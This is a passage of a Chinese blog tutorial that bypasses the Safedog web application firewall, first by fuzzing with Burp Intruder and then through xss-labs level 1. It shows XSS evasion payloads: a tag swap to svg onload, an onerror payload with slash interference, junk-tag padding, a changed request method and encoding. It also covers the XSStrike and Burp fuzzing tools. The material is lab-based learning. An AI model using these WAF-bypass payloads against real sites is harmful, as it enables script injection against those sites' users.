在这里插入图片描述

解码后,点击发送即可:

在这里插入图片描述

至此,一般的绕过方法都已测试完毕!!!

下面我们可以直接试试看fuzz大法:
fuzz大法

先获取字典

然后将之前的包发到intruder模块,然后选择图中紫色部分,再点击右边的add:

在这里插入图片描述然后点击palyloads,点击load加载你所转载的字典:
在这里插入图片描述

在这里插入图片描述

然后点击attack就行,然后我们来看看我测试的结果吧:
在这里插入图片描述

还是很多的。不得不说,fuzz在黑盒测试当中,效果还是很不错的!

三、XSS

这里将以xss-labs第一关为例子!首席按,我们先进行测试一下,狗子是否开启:
在这里插入图片描述

很好,这里已经被拦截了!!! 接下里就让我们正式开始测试一下:

1、换标签

这里,我们输入发现

那么由于html、php、js等语言的版本较多,因此,就很有可能在新一版本种出现了一些之前版本未出现过的新标签。。。若waf更新不及时,或有所疏漏,则就很有可能会被利用到一些未被收录在匹配库的标签进行绕过的!!!

那么接下来我就进行测试一下:

<img src=''>

被拦截了!!!

<svg onload=alert(1)>

噢噢噢噢,成功!

在这里插入图片描述
至于是否还有其他标签可以替换?麻烦自行尝试了,这里不再赘述。

2、特殊符号干扰:

这里所谓的特殊符号干扰,意思就是利用html标签语言的特性,通过其语法规则进行绕过,例如,一般见到/ html就很可能会识别其为标签的结束符号:<a> </a> 这里的/a 就组成了标签的结束符。

例如:

<img src ?itworksonchrome?\/onerror = alert(1170)>

在这里插入图片描述

成功,绕过了!!!

3、垃圾数据溢出:

通过填充大量的一些无关的数据,以此来达到逃逸的效果!

<body onscroll=alert(145)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x

在这里插入图片描述
4、更改提交方式:

假设我们的第一关是以request方式进行提交的。那么,如果安全狗进行检测时只读取对应的请求方式的内容的话,就可以很好的绕过了!!!

在这里插入图片描述
比如,这里我们采用request进行获取参数名,那么如果我们利用post进行上传变量的话,很可能之类是不会检测post包的!

在这里插入图片描述

5、编码/加密:
我们将所要写入的语句进行编码,或者加密已达到混淆的程度。以此,让狗子无法辨别我们传入的参数是什么,这样子就可以达到绕过了。不过有一点的是你需要能够解密!!!

在这里插入图片描述

然后,我们执行,就可以看到页面有如下的内容:

在这里插入图片描述

然后,让我们查看以下页面源代码:

在这里插入图片描述

这里已经写入了!!

然后,要怎么样触发呢? 这里我利用hackbar,进行页面的解码:(解码时候不要选中内容,因为不选中的话默认是自动将页面全部内容进行解码的,从而就可以达到执行的效果)在这里插入图片描述
这里的执行,还是利用起了hackbar的!!!

6、工具跑

XSStrike
XSStrike python3 写的一个脚本:
在这里插入图片描述

这里绿色的都是可以进行写入的!

burpsuite:

这一个要结合利用字典进行跑:
将数据包发到intruder模块,并添加上标记:ing

然后,加载字典:
在这里插入图片描述

进行攻击即可:

在这里插入图片描述

总结

虽然大致上走了一遍安全狗的waf绕过,但是我感觉还有很多的不足之处,对于绕过WAF的原理可能还不明白,因此还需继续加油!!

参考文献

安全狗绕过文献

dfzy$_$
关注
  • 4
    点赞
  • 47
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场学习者提供了一个安全学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
文件上传常用绕过方式
最新发布
weixin_43077878的博客
04-02 682
1.前端。
Python攻防-Fuzz绕过安全狗进行SQL注入
道阻且长,行则将至。
04-19 3472
文章目录前言WAF部署WAF简述网站安全狗Fuzz脚本绕过Fuzz脚本脚本效果SQLMap绕过Fuzz关键词tamper绕过总结 前言 在渗透测试过程中,经常会遇到很多 Web 站点部署了 WAF,这个时候使用常规的 Payload 进行 XSS、SQL 注入的检测避免不了被 WAF 拦截阻断的命运。 Fuzz 模糊测试是一种有效的检测 WAF 过滤规则缺陷并尝试进行 WAF 绕过的技术,本文将以“PhpStudy+DVWA+ 安全狗v4.0”的实验环境演示 Fuzz 测试绕过 WAF。 WAF部署 我在
安全狗详细安装、遇见无此服务器解决、在windows中命令提示符中进入查看指定文件夹手动启动Apache
02-26 3374
详细的网络安全狗安装,即可能遇见的无此服务器问题解决
安全狗安装
weixin_48776804的博客
02-14 3217
安全狗安装
安全狗】linux免费服务器防护软件安全狗详细安装教程
G佳伟
07-21 2304
在费用有限的基础上,复杂密码+云服务器基础防护+常见端口替换+安全软件,可以防护绝大多数攻击。
安全狗安装
遇事不决冲冲冲
05-25 7880
一.前言 二.下载安装环境部署 专门把下载安装环境部署放到这里讲一下,因为我当时被困扰了一个多少小时,网上查了好多,也问了网上一些人,最后最后才找到一能解决的,不问不知道,被安装部署困扰到的人还真不少,这里我把我安装过程中踩到的坑都写出来,再附上正确安装步骤。 1.下载 这里我就直接贴上下载地址,当时我是搜的网站安全狗 进去以后指一下免费下载,然后点击 2.服务名 我觉得这里就算是一个小坑了,我也是卡在这里好长时间,打开看见一个服务名,不知道该写啥,贴一个环境配置视频吧,这上面说用的是phpstud
WAF相关知识及安全狗的部署和绕过
北冥同学的成长记录笔记
07-16 2878
WAF即Web应用程序防火墙通过过滤和监视Web应用程序与Internet之间的HTTP通信来帮助保护Web应用程序,Web Application Firewall (WEB 应用防护系统)。
解决安全狗安装后显示apache插件未安装,无法使用的问题。
Wwwwwwhyyyy的博客
12-07 584
我在卸载了安全狗后,我的本机电脑就无法安装安全狗了,在安装界面显示了无法检测到apache坏境之后,就会自动关闭,但是打开了apache服务之后,连提示都不给,直接自动关闭,所以导致我又重新安装了一个win镜像。为了确保不会遇到像我一样的问题,还是使用文件夹自带的安全狗卸载。4.打开任务管理器,选择服务页面,然后右键apache,启动apache就行了。6.弹出安装程序,自动填写了服务名,直接点击确定,开始安装。5.右键下方的安全狗图标,点击未安装,进行安装。软件直接在安全狗的官网下载就行了。
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
WEB渗透学习-upload-labs靶场
04-20
upload-labs为WEB渗透中文件上传漏洞专项练习靶场,内涵各种文件上传漏洞类型,采用关卡制,一共21关,由易到难,适合刚接触该漏洞的新手巩固练习
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
渗透测试上传漏洞经典靶场学习-upload-labs
web安全-SQL注入-认识安全狗-WAF绕过常用方法以及示例
ran的博客
01-20 1532
特殊符号%00,部分 waf 遇到%00 截断,只能获取到前面的参数,无法获取到后面的有害参数输 入 , 从 而 导 致 Bypass。select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin。mysql 注释符有三种:#、/*...*/、-- ... (注意--后面有一个空格)// -- --+ # /**/ + :%00 /!Hex() bin() 等价于 ascii()
WAF - SQL注入绕过安全狗靶场实战
weixin_54771278的博客
05-26 650
WAF - SQL注入绕过安全狗靶场实战 实验介绍 安全狗,互联网安全品牌,云安全服务与解决方案提供商 。 企业用户遍布互联网金融、电商、游戏、移动互联网、政府单位等多个行业。 网站安全狗 : 面向网站安全,包括:网马扫描及查杀(自有引擎,只针对网页木马);网马主动防御功能(可主动拦截网马上传和访问的动作);防SQL注入功能、防XSS跨站攻击功能;防盗链防下载;以及防止CC攻...
phpstudy环境安装安全狗
FY603438169的博客
11-30 1388
安全狗安装填写服务器名称问题
【小迪安全】Day18-19web漏洞-SQL注入之安全狗waf绕过
qq_44312640的博客
11-06 531
介绍了安全狗绕过方法及思路。
sqli-labs靶场安装
07-28
安装sqli-labs靶场,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了一个Web服务器以及PHP和MySQL。您可以使用XAMPP、WAMP、LAMP等工具包来安装这些软件。 2. 下载sqli-labs靶场的源代码。您可以在GitHub上找到它的仓库,使用git命令进行克隆,或者直接下载ZIP文件并解压。 3. 将解压后的sqli-labs文件夹移动到您的Web服务器的根目录下。例如,如果您使用XAMPP,将其移动到XAMPP安装目录下的htdocs文件夹内。 4. 打开MySQL数据库管理工具(如phpMyAdmin)并创建一个新的数据库,命名为sqli_labs。 5. 在sqli_labs文件夹中,找到includes目录下的db-creds.inc文件。使用文本编辑器打开它,并根据您的数据库设置,填写正确的数据库名称、用户名和密码。 6. 导入初始数据库结构。在sqli_labs文件夹中找到db_setup.php文件,然后在浏览器中访问它(例如http://localhost/sqli-labs/db_setup.php)。这将创建必要的表和数据。 7. 完成以上步骤后,您可以通过浏览器访问sqli-labs靶场了。例如,使用http://localhost/sqli-labs/进行访问。 请注意,sqli-labs是一个用于学习和测试SQL注入漏洞的靶场,仅在安全环境中使用。确保在使用时采取适当的安全措施,并且不要将其部署在公共服务器上以防止被滥用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值